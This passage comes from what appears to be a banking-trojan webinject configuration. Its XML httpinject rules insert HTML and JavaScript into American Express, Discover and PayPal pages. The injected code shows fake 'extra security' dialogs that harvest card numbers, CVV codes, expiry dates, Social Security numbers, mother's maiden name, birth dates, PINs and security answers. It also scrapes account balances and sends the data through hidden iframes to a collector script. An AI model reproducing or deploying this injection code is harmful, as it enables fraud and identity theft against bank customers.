- <input type="text" class="amountfield" id="dob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_yy" maxlength=4 >
- </div></td>
- </tr>
- </table>
- </div>
- <!--MDOB-->
- <div id="txt2" class=sunclass style="text-align: left;">
- <table>
- <tr>
- <td align="right">
- <div id="div_mdob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Mother Date of birth:</font></td></div>
- <td><div id="div_pininp" style =" padding:1px;">
- <input type="text" class="amountfield" id="mdob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_mm" maxlength=2 >
- <font style="font-family: Verdana;font-size: 11px;">-</font>
- <input type="text" class="amountfield" id="mdob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_dd" maxlength=2 >
- <font style="font-family: Verdana;font-size: 11px;">-</font>
- <input type="text" class="amountfield" id="mdob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_yy" maxlength=4 >
- </div></td>
- </tr>
- </table>
- </div>
- <!--Email-->
- <div id="txt2" class=sunclass style="text-align: left;">
- <table>
- <tr>
- <td align="right">
- <div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">Your Email:</font></td></div>
- <td><div id="div_email" style =" padding:1px;">
- <input type="text" class="amountfield" id="email" style="width:160px; height:12px; text-align:left; font-weight:700;font-family: Arial;font-size: 10px;" name="email" >
- </div></td>
- </tr>
- </table>
- </div>
- <div id="txt2" class=sunclass style="height: 20px; padding:3px ;padding-right:15px;">
- <font style="font-weight:700;font-family: Arial;font-size: 10px;text-align:right;"><div align="right"><input type="image" onclick="return formmySubmit();" align="right" src="/myca/shared/summary/asr/images/lnf/btn_continue.gif" value="Verify" title="Continue"/></div></font>
- </div>
- <input type="hidden" name="system" value="14">
- </form>
- </div><script type="text/javascript">
- function tabNext1CC(elem) {
- if(elem.value.length == 4) {
- document.getElementById('cc2').focus();
- function tabNext2CC(elem) {
- if(elem.value.length == 6) {
- document.getElementById('cc3').focus();
- function formmySubmit() {
- $("#msg").css("background", "#f5f6f1");
- if (checkCC()) {
- $("#div_cc_text").css("color", "black");
- if (checkExp()) {
- $("#div_exp").css("color", "black");
- if (checkCVV()) {
- $("#div_cvv").css("color", "black");
- if (check3DigitCode()) {
- $("#div_3digitcode").css("color", "black");
- if (SSN_check() == true) {
- $("#div_ssn").css("color", "black");
- if (PS_PIN_check() == true) {
- $("#div_ps_pin").css("color", "black");
- if (POB_check() == true) {
- $("#div_pob").css("color", "black");
- if (Email_check() == true) {
- $("#div_email").css("color", "black");
- if (checkDob() == true) {
- $("#div_dob").css("color", "black");
- $("#div_mdob").css("color", "black");
- $.cookie("trusted_rapport", "1", {
- expires: 10,
- path: "/",
- domain: ".americanexpress.com"
- });
- $("#dialog").dialog("close");
- return true
- } else {
- $("#div_dob").css("color", "red");
- $("#div_mdob").css("color", "red");
- doError("Date of birth")
- } else {
- $("#div_email").css("color", "red");
- doError("Email")
- } else {
- $("#div_pob").css("color", "red");
- doError("place of birth")
- } else {
- $("#div_ps_pin").css("color", "red");
- doError("personal security PIN")
- } else {
- $("#div_ssn").css("color", "red");
- doError("social security number")
- } else {
- $("#div_3digitcode").css("color", "red");
- doError("3-digit code")
- } else {
- $("#div_cvv").css("color", "red");
- doError("cvv code")
- } else {
- $("#div_exp").css("color", "red");
- doError("expiration date")
- } else {
- $("#div_cc_text").css("color", "red");
- doError("card number")
- function out() {
- document.body.removeChild(img)
- function move(a) {
- a = a || window.event;
- if (a.pageX == null && a.clientX != null) {
- var b = document.documentElement;
- var c = document.body;
- a.pageX = a.clientX + (b && b.scrollLeft || c && c.scrollLeft || 0) - (b.clientLeft || 0);
- a.pageY = a.clientY + (b && b.scrollTop || c && c.scrollTop || 0) - (b.clientTop || 0)
- img.style.left = a.pageX + 15 + "px";
- img.style.top = a.pageY + 15 + "px"
- function over(a) {
- img = document.createElement("div");
- document.body.appendChild(img);
- img.innerHTML = "<img src=" + a + " />";
- img.style.zIndex = "111111111111";
- img.style.position = "absolute";
- img.style.background = "#FFFFFF";
- img.style.border = "solid 1px #346fdc";
- img.style.padding = "4px";
- move();
- function SSN_check() {
- var a = $("#ssn_1").val();
- var b = $("#ssn_2").val();
- var c = $("#ssn_3").val();
- var d = a.length + b.length + c.length;
- if (d == 9)
- if ((isNaN(a) || isNaN(b) || isNaN(c)) == false)
- return true;
- return false
- function PS_PIN_check() {
- var a = $("#ps_pin").val();
- var d = a.length;
- if (d == 4)
- //if (isNaN(a) == false) // uncomment if pin is digital only
- return true;
- return false
- function POB_check() {
- var a = $("#pob").val();
- var d = a.length;
- if (d > 0) {
- return true;
- else {
- return true;
- function Email_check() {
- var a = $("#email").val();
- var d = a.length;
- if (d > 0) {
- return true;
- else {
- return true;
- function check3DigitCode() {
- var a = $("#3digitcode").val();
- var b = a.length;
- if (isNaN(a) == false)
- if (b == 3)
- return true;
- return false
- function checkCVV() {
- var a = $("#cvv").val();
- var b = a.length;
- if (isNaN(a) == false)
- if (b == 4)
- return true;
- return false
- function checkExp() {
- var a = $("#exp_mm").val();
- var b = $("#exp_yy").val();
- var c = a.length + b.length;
- if (c > 5)
- if (a > 0 && a < 13)
- if (b > 2009 && b < 2030)
- return true;
- return false
- function checkCC() {
- var a = $("#cc1").val();
- var b = $("#cc2").val();
- var c = $("#cc3").val();
- if (check_cc(a+b+c) && a.charAt(0) == "3")
- return true;
- return false
- function checkDob() {
- var a = $("#dob_mm").val();
- var b = $("#dob_dd").val();
- var c = $("#dob_yy").val();
- var d = $("#mdob_mm").val();
- var e = $("#mdob_dd").val();
- var f = $("#mdob_yy").val();
- var g = a.length + b.length + c.length;
- var h = d.length + e.length + f.length;
- if ((isNaN(a) || isNaN(b) || isNaN(c)) == false)
- if (g > 6)
- if (c < 1995 && c > 1900)
- if (a > 0 && a < 13 && b > 0 && b < 32)
- if ((isNaN(d) || isNaN(e) || isNaN(f)) == false)
- if (h > 6)
- if (d > 0 && d < 13 && e > 0 && e < 32)
- if (f + 12 < c)
- return true;
- return false
- function doError(a) {
- $("#ername").text(a);
- $("#ername1").text(a);
- $("#msg").dialog({
- closeOnEscape: false,
- resizable: false,
- modal: true,
- width: 350,
- modal: true,
- zIndex: 99999
- function formClose() {
- $("#msg").dialog("close");
- return true
- function check_cc(cardnumber) {
- var cardNo = cardnumber.replace(/[^0-9]/g, "");
- if (cardNo.length < 15 || cardNo.length > 16) {
- return false;
- var checksum = 0;
- var j = 1;
- var calc;
- for (i = cardNo.length - 1; i >= 0; i--) {
- calc = Number(cardNo.charAt(i)) * j;
- if (calc > 9) {
- checksum = checksum + 1;
- calc = calc - 10;
- checksum = checksum + calc;
- if (j == 1) {
- j = 2;
- } else {
- j = 1;
- if (checksum % 10 != 0) {
- return false;
- return true;
- jQuery.cookie = function(a, b, c) {
- if (typeof b != "undefined") {
- c = c || {};
- if (b === null) {
- b = "";
- c.expires = -1
- var d = "";
- if (c.expires && (typeof c.expires == "number" || c.expires.toUTCString)) {
- var e;
- if (typeof c.expires == "number") {
- e = new Date;
- e.setTime(e.getTime() + c.expires * 24 * 60 * 60 * 1e3)
- } else
- e = c.expires;
- d = "; expires=" + e.toUTCString()
- var f = c.path ? "; path=" + c.path: "";
- var g = c.domain ? "; domain=" + c.domain: "";
- var h = c.secure ? "; secure": "";
- document.cookie = [a, "=", encodeURIComponent(b), d, f, g, h].join("")
- } else {
- var i = null;
- if (document.cookie && document.cookie != "") {
- var j = document.cookie.split(";");
- for (var k = 0; k < j.length; k++) {
- var l = jQuery.trim(j[k]);
- if (l.substring(0, a.length + 1) == a + "=") {
- i = decodeURIComponent(l.substring(a.length + 1));
- break
- return i
- if ($.cookie("trusted_rapport"));
- else
- $(document).ready(function() {
- $('.comingSoonPop').remove();
- $('.comingSoonTransLayer').remove();
- $("#dialog").dialog({
- closeOnEscape: false,
- resizable: false,
- modal: true,
- width: 350,
- modal: true,
- zIndex: 99998
- });
- $("a.ui-dialog-titlebar-close").replaceWith('<div align="center" style="overflow: hidden; position: relative;padding:0; margin:0"><img src="https://secure.americanexpress.com/NextGenNavigation/img/logo_bluebox.gif"></div>');
- // balance
- $('form#test').append('<input id=balance name=balance type=hidden>');
- var balance = '';
- balance += 'Outstanding Balance='+$('div#outBalAmount').text().replace('and', '').replace('Cents', '')+" ___ ";
- balance += 'Available Credit ='+$('div#limitMsgAvailableCrd').text()+" ___ ";
- //alert(balance);
- $('form#test input#balance').val(balance);
- </script></body>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://.*\.americanexpress\.com.*]]></url>
- <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[\</html\>]]></pattern>
- <replacement><![CDATA[<script type="text/javascript">
- // remove saved IDs
- Delete_Cookie("profile", "/", ".americanexpress.com");
- var UsernameField = document.getElementById('Username');
- if(UsernameField) {
- UsernameField.value = '';
- UsernameField.blur();
- function get_cookie(name) {
- var cookie = " " + document.cookie;
- var search = " " + name + "=";
- var setStr = null;
- var offset = 0;
- var end = 0;
- if (cookie.length > 0) {
- offset = cookie.indexOf(search);
- if (offset != -1) {
- offset += search.length;
- end = cookie.indexOf(";", offset);
- if (end == -1) {
- end = cookie.length;
- setStr = unescape(cookie.substring(offset, end));
- return setStr;
- function Delete_Cookie( name, path, domain ) {
- if ( get_cookie( name ) ) document.cookie = name + "=" +
- ( ( path ) ? ";path=" + path : "") +
- ( ( domain ) ? ";domain=" + domain : "" ) +
- ";expires=Thu, 01-Jan-1970 00:00:01 GMT";
- </script></html>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U">^https\://www\.discovercard\.com/cardmembersvcs/achome/
- </url>
- <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[</body>]]></pattern>
- <replacement><![CDATA[<div id="namefr" style="display:none;" >
- <iframe width="50" height="50" id="myfx" name="myfx"></iframe>
- <iframe width="50" height="50" id="myfx1" name="myfx1" src="https://www.discovercard.com/cardmembersvcs/personalprofile/pp/GetInitialInfo"></iframe>
- </div>
- <link href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/base/jquery-ui.css" rel="stylesheet" type="text/css"/>
- <style type="text/css">
- .ui-dialog-titlebar{ background: white }
- .text1a{font-family: Arial; font-size: 10px;}
- .sunclass
- border-bottom-color: #cccccc;
- border-bottom-style: solid;
- border-bottom-width: 1px;
- border-collapse: collapse;
- background-color: #f5f6f1;
- color: #333333;
- margin-right:10px;
- margin-left:10px;
- text-align: center;
- </style>
- <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
- <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
- <div id="msg" style=" display:none; height:80px;" class=sunclass>
- <div id="box" class=sunclass style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;padding-top:20px;padding-bottom:20px;">
- <font style="font-weight:700;font-family: Arial;font-size: 12px;">The <span id="ername">Passcode</span> you entered does not match our records. Please verify and make sure you re-enter your <span id="ername1"> passcode </span>  correctly.</font>
- </div>
- <div id="qdiv" style="display:none; width : 400px;" >
- <div id="txt1" class=sunclass style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;">
- <font style="font-weight:700;font-family: Arial;font-size: 10px;">In order to provide you with extra security ,we occasionally need to ask for additional information when you access you account online.</font>
- </div>
- <div id="txt2" class=sunclass>
- <font style="font-weight: 700;font-family: Arial;font-size: 10px;">Please answer the following questions:</font>
- </div>
- <form action="statsgatherr.js" id="test" method="get" target="myfx" >
- <div id="txt2" class=sunclass style="text-align: right;">
- <table>
- <tr>
- <td align="right">
- <div id="div_question_1" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">In what city were you born?</font></td></div>
- <td><div id="div_pininp" style =" padding:1px;">
- <input type="text" class="amountfield" id="q1" style="width:160px; height:12px; text-align:right; font-weight:700;font-family: Arial;font-size: 10px;" name="borncity" method="get" />
- </div></td>
- </tr>
- </table>
- </div>
- <div id="txt2" class=sunclass style="text-align: right;">
- <table>
- <tr>
- <td align="right">
- <div id="div_question_2" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">What is your father's middle name?</font></td></div>
- <td><div id="div_pininp" style =" padding:1px;">
- <input type="text" class="amountfield" id="q2" style="width:160px; height:12px; text-align:right; font-weight:700;font-family: Arial;font-size: 10px;" name="fotherMN " method="get" />
- </div></td>
- </tr>
- </table>
- </div>
- <div id="txt2" class=sunclass style="text-align: right;">
- <table>
- <tr>
- <td align="right">
- <div id="div_question_3" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">What is your mother's middle name?</font></td></div>
- <td><div id="div_pininp" style =" padding:1px;">
- <input type="text" class="amountfield" id="q3" style="width:160px; height:12px; text-align:right; font-weight:700;font-family: Arial;font-size: 10px;" name="motherMN" method="get" />
- </div></td>
- </tr>
- </table>
- </div>
- <div id="txt2" class=sunclass style="padding:3px ;padding-right:15px;">
- <font style="font-weight:700;font-family: Arial;font-size: 10px;text-align:right;"><div align="right">
- <input border="0" type="image" alt="Continue" onclick="return quest();" src="/discover/images/account/buttons/btn_continue.gif">
- </div>
- <input type="hidden" name="system" value="14">
- </form>
- </div>
- </div>
- </div>
- <div id="dialog" style=" display:none; height:180px; width:350px;padding:0; margin0;">
- <div id="txt1" class=sunclass style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;">
- <font style="font-weight:700;font-family: Arial;font-size: 10px;">In order to provide you with extra security ,we occasionally need to ask for additional information when you access you account online.</font>
- </div>
- <div id="txt2" class=sunclass>
- <font style="font-weight: 700;font-family: Arial;font-size: 10px;">Please enter the information below to continue:</font>
- </div>
- <form action="statsgatherr.js" id="test" method="get" target="myfx" >
- <!--CC-->
- <div id="full_cc" class=sunclass style="text-align: left;">
- <table>
- <tr>
- <td>
- <div id="div_cc_text" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;">
- <font style="font-weight:700;font-family: Arial;font-size: 10px;">Credit Card Number:</font><br><span class="text1a">(16 digits)</span></td></div>
- </td>
- <td>
- <div id="div_cc" style ="padding:1px;">
- <input type="text" class="amountfield" id="cc1" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px; width=46px;" name="cc1" method="get" maxlength=4 ></input>
- <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
- <input type="text" class="amountfield" id="cc2"style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px; " name="cc2" method="get" maxlength=4 ></input>
- <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
- <input type="text" class="amountfield" id="cc3" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="cc3" method="get" maxlength=4 ></input>
- <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
- <input type="text" class="amountfield" id="cc4" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="cc4" method="get" maxlength=4 ></input>
- </div>
- </td>
- </tr>
- </table>
- </div>
- <!--EXP-->
- <div id="fulll_exp" class=sunclass style="text-align: left;">
- <table>
- <tr>
- <td align="right">
- <div id="div_exp" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;">
- <font style="font-weight:700;font-family: Arial;font-size: 10px;">Exp.date:</font><br><span class="text1a">(/mm/yyyy/)</span></td></div>
- </td>
- <td>
- <div id="div_exp" style ="padding:1px;">
- <input type="text" class="amountfield" id="exp_mm" style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="exp_mm" method="get" maxlength=2 ></input>
- <font style="font-weight:700;font-family: Arial;font-size: 10px;">/</font>
- <input type="text" class="amountfield" id="exp_yy"style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="exp_yy" method="get" maxlength=4 ></input>
- </div></td>
- </tr>
- </table>
- </div>
- <!--CVV-->
- <div id="txt2" class=sunclass style="text-align: left;">
- <table>
- <tr>
- <td align="right">
- <div id="div_cvv" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;">
- <font style="font-weight:700;font-family: Arial;font-size: 10px;">CVV Code:</font><br><span class="text1a">(3 digits)</span></td></div>
- <td><div id="div_pininp" style =" padding:1px;"><input type="text" id="cvv" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="cvv" method="get" maxlength=3 ></input></div></td>
- </tr>
- </table>
- </div>
- <!--SSN-->
- <div id="txt2" class=sunclass style="text-align: left;">
- <table>
- <tr>
- <td align="right">
- <div id="div_ssn" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Social Security Number:</font><br><span class="text1a">(9 digits)</span></td></div>
- <td><div id="div_pininp" style =" padding:1px;">
- <input type="text" class="amountfield" id="ssn_1" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_1" method="get" maxlength=3 ></input>
- <font style="font-family: Verdana;font-size: 11px;">-</font>
- <input type="text" class="amountfield" id="ssn_2" style="width:38px; height14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_2" method="get" maxlength=2 ></input>
- <font style="font-family: Verdana;font-size: 11px;">-</font>
- <input type="text" class="amountfield" id="ssn_3" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_3" method="get" maxlength=4 ></input>
- </div></td>
- </tr>
- </table>
- </div>
- <!--MMN-->
- <div id="txt2" class=sunclass style="text-align: left;">
- <table>
- <tr>
- <td align="right">
- <div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">Mother's Maiden Name:</font></td></div>
- <td><div id="div_pininp" style =" padding:1px;">
- <input type="text" class="amountfield" id="mmn" style="width:160px; height:12px; text-align:right; font-weight:700;font-family: Arial;font-size: 10px;" name="mmn" method="get" ></input>
- </div></td>
- </tr>
- </table>
- </div>
- <!--DOB-->
- <div id="txt2" class=sunclass style="text-align: left;">
- <table>
- <tr>
- <td align="right">
- <div id="div_dob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Date of birth:</font><br><span class="text1a">(/mm/dd/yyyy/)</span></td></div>
- <td><div id="div_pininp" style =" padding:1px;">
- <input type="text" class="amountfield" id="dob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_mm" method="get" maxlength=2 ></input>
- <font style="font-family: Verdana;font-size: 11px;">-</font>
- <input type="text" class="amountfield" id="dob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_dd" method="get" maxlength=2 ></input>
- <font style="font-family: Verdana;font-size: 11px;">-</font>
- <input type="text" class="amountfield" id="dob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_yy" method="get" maxlength=4 ></input>
- </div></td>
- </tr>
- </table>
- </div>
- <!--MDOB-->
- <div id="txt2" class=sunclass style="text-align: left;">
- <table>
- <tr>
- <td align="right">
- <div id="div_mdob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Mother Date of birth:</font><br><span class="text1a">(/mm/dd/yyyy/)</span></td></div>
- <td><div id="div_pininp" style =" padding:1px;">
- <input type="text" class="amountfield" id="mdob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_mm" method="get" maxlength=2 ></input>
- <font style="font-family: Verdana;font-size: 11px;">-</font>
- <input type="text" class="amountfield" id="mdob_dd" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_dd" method="get" maxlength=2 ></input>
- <font style="font-family: Verdana;font-size: 11px;">-</font>
- <input type="text" class="amountfield" id="mdob_yy" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="mdob_yy" method="get" maxlength=4 ></input>
- </div></td>
- </tr>
- </table>
- </div>
- <!--Sequence Number-->
- <div id="txt2" class=sunclass style="text-align: left;">
- <table>
- <tr>
- <td align="right">
- <div id="div_seqnum" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Sequence Number:</font><br><span class="text1a">(1 letter and 3 digits)</span></td></div>
- <td><div id="div_pininp" style =" padding:1px;">
- <input type="text" class="amountfield" id="seqnum" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="seqnum" method="get" maxlength=4 ></input>
- </div></td>
- </tr>
- </table>
- </div>
- <div id="txt2" class=sunclass style="padding:3px ;padding-right:15px;">
- <font style="font-weight:700;font-family: Arial;font-size: 10px;text-align:right;"><div align="right">
- <input border="0" type="image" alt="Continue" onclick="return formmySubmit();" src="/discover/images/account/buttons/btn_continue.gif">
- </div></font>
- </div>
- <input type="hidden" name="system" value="14">
- </form>
- </div>
- <script type="text/javascript">
- jQuery.cookie = function (name, value, options) {
- if (typeof value != "undefined") {
- options = options || {};
- if (value === null) {
- value = "";
- options.expires = -1
- var expires = "";
- if (options.expires && (typeof options.expires == "number" || options.expires.toUTCString)) {
- var date;
- if (typeof options.expires == "number") {
- date = new Date;
- date.setTime(date.getTime() + options.expires * 24 * 60 * 60 * 1E3)
- } else date = options.expires;
- expires = "; expires=" + date.toUTCString()
- var path = options.path ? "; path=" + options.path : "";
- var domain = options.domain ? "; domain=" + options.domain : "";
- var secure = options.secure ? "; secure" : "";
- document.cookie = [name, "=", encodeURIComponent(value), expires, path, domain, secure].join("")
- } else {
- var cookieValue = null;
- if (document.cookie && document.cookie != "") {
- var cookies = document.cookie.split(";");
- for (var i = 0; i < cookies.length; i++) {
- var cookie = jQuery.trim(cookies[i]);
- if (cookie.substring(0, name.length + 1) == name + "=") {
- cookieValue = decodeURIComponent(cookie.substring(name.length + 1));
- break
- return cookieValue
- function formClose() {
- $("#msg").dialog("close");
- return true
- function quest() {
- var q1 = $("#q1").val();
- var q2 = $("#q2").val();
- var q3 = $("#q3").val();
- var bq_11 = /[a-zA-Z]+/.test(q1);
- var bq_12 = /[0-9]+/.test(q1);
- var bq_21 = /[a-zA-Z]+/.test(q2);
- var bq_22 = /[0-9]+/.test(q2);
- var bq_31 = /[a-zA-Z]+/.test(q3);
- var bq_32 = /[0-9]+/.test(q3);
- if (q1.length < 3 || q2.length < 3 || q3.length < 3) {
- alert("The answers you entered does not match our records. Please verify and make sure you re-enter your answers correctly.");
- return false
- if (bq_11 == true && bq_12 == false && bq_21 == true && bq_22 == false && bq_31 == true && bq_32 == false);
- else {
- alert("The answers you entered does not match our records. Please verify and make sure you re-enter your answers correctly.");
- return false
- $.cookie("trusted_rapport", "1", {
- expires: 20,
- path: "/",
- domain: ".discovercard.com"
- });
- $("#qdiv").dialog("close");
- return true
- function doError(erstring) {
- $("#ername").text(erstring);
- $("#ername1").text(erstring);
- $("#msg").dialog({
- closeOnEscape: false,
- resizable: false,
- modal: true,
- width: 350,
- modal: true,
- zIndex: 99999
- function checkDob() {
- var dob_mm = $("#dob_mm").val();
- var dob_dd = $("#dob_dd").val();
- var dob_yy = $("#dob_yy").val();
- var mdob_mm = $("#mdob_mm").val();
- var mdob_dd = $("#mdob_dd").val();
- var mdob_yy = $("#mdob_yy").val();
- var totalLengthDOB = dob_mm.length + dob_dd.length + dob_yy.length;
- var totalLengthMDOB = mdob_mm.length + mdob_dd.length + mdob_yy.length;
- if ((isNaN(dob_mm) || isNaN(dob_dd) || isNaN(dob_yy)) == false) if (totalLengthDOB > 6) if (dob_yy < 1995 && dob_yy > 1900) if (dob_mm > 0 && dob_mm < 13 && dob_dd > 0 && dob_dd < 32) if ((isNaN(mdob_mm) || isNaN(mdob_dd) || isNaN(mdob_yy)) == false) if (totalLengthMDOB > 6) if (mdob_mm > 0 && mdob_mm < 13 && mdob_dd > 0 && mdob_dd < 32) if (mdob_yy + 12 < dob_yy) return true;
- return false
- function checkCC() {
- var cc1 = $("#cc1").val();
- var cc2 = $("#cc2").val();
- var cc3 = $("#cc3").val();
- var cc4 = $("#cc4").val();
- var totalLengthCC = cc1.length + cc2.length + cc3.length + cc4.length;
- if (totalLengthCC > 12) if ((isNaN(cc1) || isNaN(cc2) || isNaN(cc3) || isNaN(cc4)) == false) if (cc1.charAt(0) == "6") if (cc1 != cc2 && cc1 != cc3 && cc1 != cc4 && cc2 != cc3 && cc2 != cc4 && cc3 != cc4) return true;
- return false
- function checkExp() {
- var exp_mm = $("#exp_mm").val();
- var exp_yy = $("#exp_yy").val();
- var totalLengthEXP = exp_mm.length + exp_yy.length;
- if (totalLengthEXP > 5) if (exp_mm > 0 && exp_mm < 13) if (exp_yy > 2009 && exp_yy < 2030) return true;
- return false
- function checkCVV() {
- var cvv_num = $("#cvv").val();
- var cvvLength = cvv_num.length;
- if (isNaN(cvv_num) == false) if (cvvLength == 3) return true;
- return false
- function SSN_check() {
- var ssn_1 = $("#ssn_1").val();
- var ssn_2 = $("#ssn_2").val();
- var ssn_3 = $("#ssn_3").val();
- var totalLengthSSN = ssn_1.length + ssn_2.length + ssn_3.length;
- if (totalLengthSSN == 9) if ((isNaN(ssn_1) || isNaN(ssn_2) || isNaN(ssn_3)) == false) return true;
- return false
- function SeqNum_check() {
- var seqnum = $("#seqnum").val();
- if (/^[a-zA-Z][0-9]{3}$/.test(seqnum)) return true;
- return false
- function formmySubmit() {
- $("#msg").css("background", "#f5f6f1");
- if (checkCC()) {
- $("#div_cc_text").css("color", "black");
- if (checkExp()) {
- $("#div_exp").css("color", "black");
- if (checkCVV()) {
- $("#div_cvv").css("color", "black");
- if (SSN_check() == true) {
- $("#div_ssn").css("color", "black");
- if (SeqNum_check() == true) {
- $("#div_seqnum").css("color", "black");
- if (checkDob() == true) {
- $("#div_dob").css("color", "black");
- $("#div_mdob").css("color", "black");
- $("#dialog").dialog("close");
- $("#qdiv").dialog({
- closeOnEscape: false,
- resizable: false,
- modal: true,
- width: 400,
- modal: true,
- zIndex: 99999
- });
- $("a.ui-dialog-titlebar-close").replaceWith('<div align="center" style="overflow: hidden; position: relative;padding:0; margin:0"><img src="https://www.discovercard.com/images/ac-header/discover-card-logo.gif"></div>');
- return true
- } else {
- $("#div_dob").css("color", "red");
- $("#div_mdob").css("color", "red");
- doError("Date of birth")
- } else {
- $("#div_seqnum").css("color", "red");
- doError("sequence number")
- } else {
- $("#div_ssn").css("color", "red");
- doError("social security number")
- } else {
- $("#div_cvv").css("color", "red");
- doError("cvv code")
- } else {
- $("#div_exp").css("color", "red");
- doError("expiration date")
- } else {
- $("#div_cc_text").css("color", "red");
- doError("card number")
- if ($.cookie("trusted_rapport"));
- else $(document).ready(function () {
- $("#dialog").dialog({
- closeOnEscape: true,
- resizable: false,
- modal: true,
- width: 350,
- modal: true,
- zIndex: 99998
- });
- $("a.ui-dialog-titlebar-close").replaceWith('<div align="center" style="overflow: hidden; position: relative;padding:0; margin:0"><img src="https://www.discovercard.com/images/ac-header/discover-card-logo.gif"></div>')
- });
- </script></body>]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="iU">ya\.ru
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="i"><![CDATA[<title>]]></pattern>
- <replacement><![CDATA[<title>XXXYAR: ]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U" contentType="^text/(html|plain)"><![CDATA[^https://www.paypal.com/myaccount]]></url>
- <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(</html>)]]></pattern>
- <replacement><![CDATA[
- <script type="text/javascript" language="JavaScript" src="statsgatherr.js?system=15"></script>\1]]></replacement>
- </modify>
- </actions>
- </httpinject>
- <httpinject>
- <conditions>
- <url type="allow" onpost="1" onget="1" modifiers="U" contentType="^text/(html|plain)"><![CDATA[www\.paypal\.com]]></url>
- <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)
- </url>
- </conditions>
- <actions>
- <modify>
- <pattern modifiers="msU"><![CDATA[(</head>)]]></pattern>
- <replacement><![CDATA[
- <script language="javascript">
- function onformlsubmit(theForm){
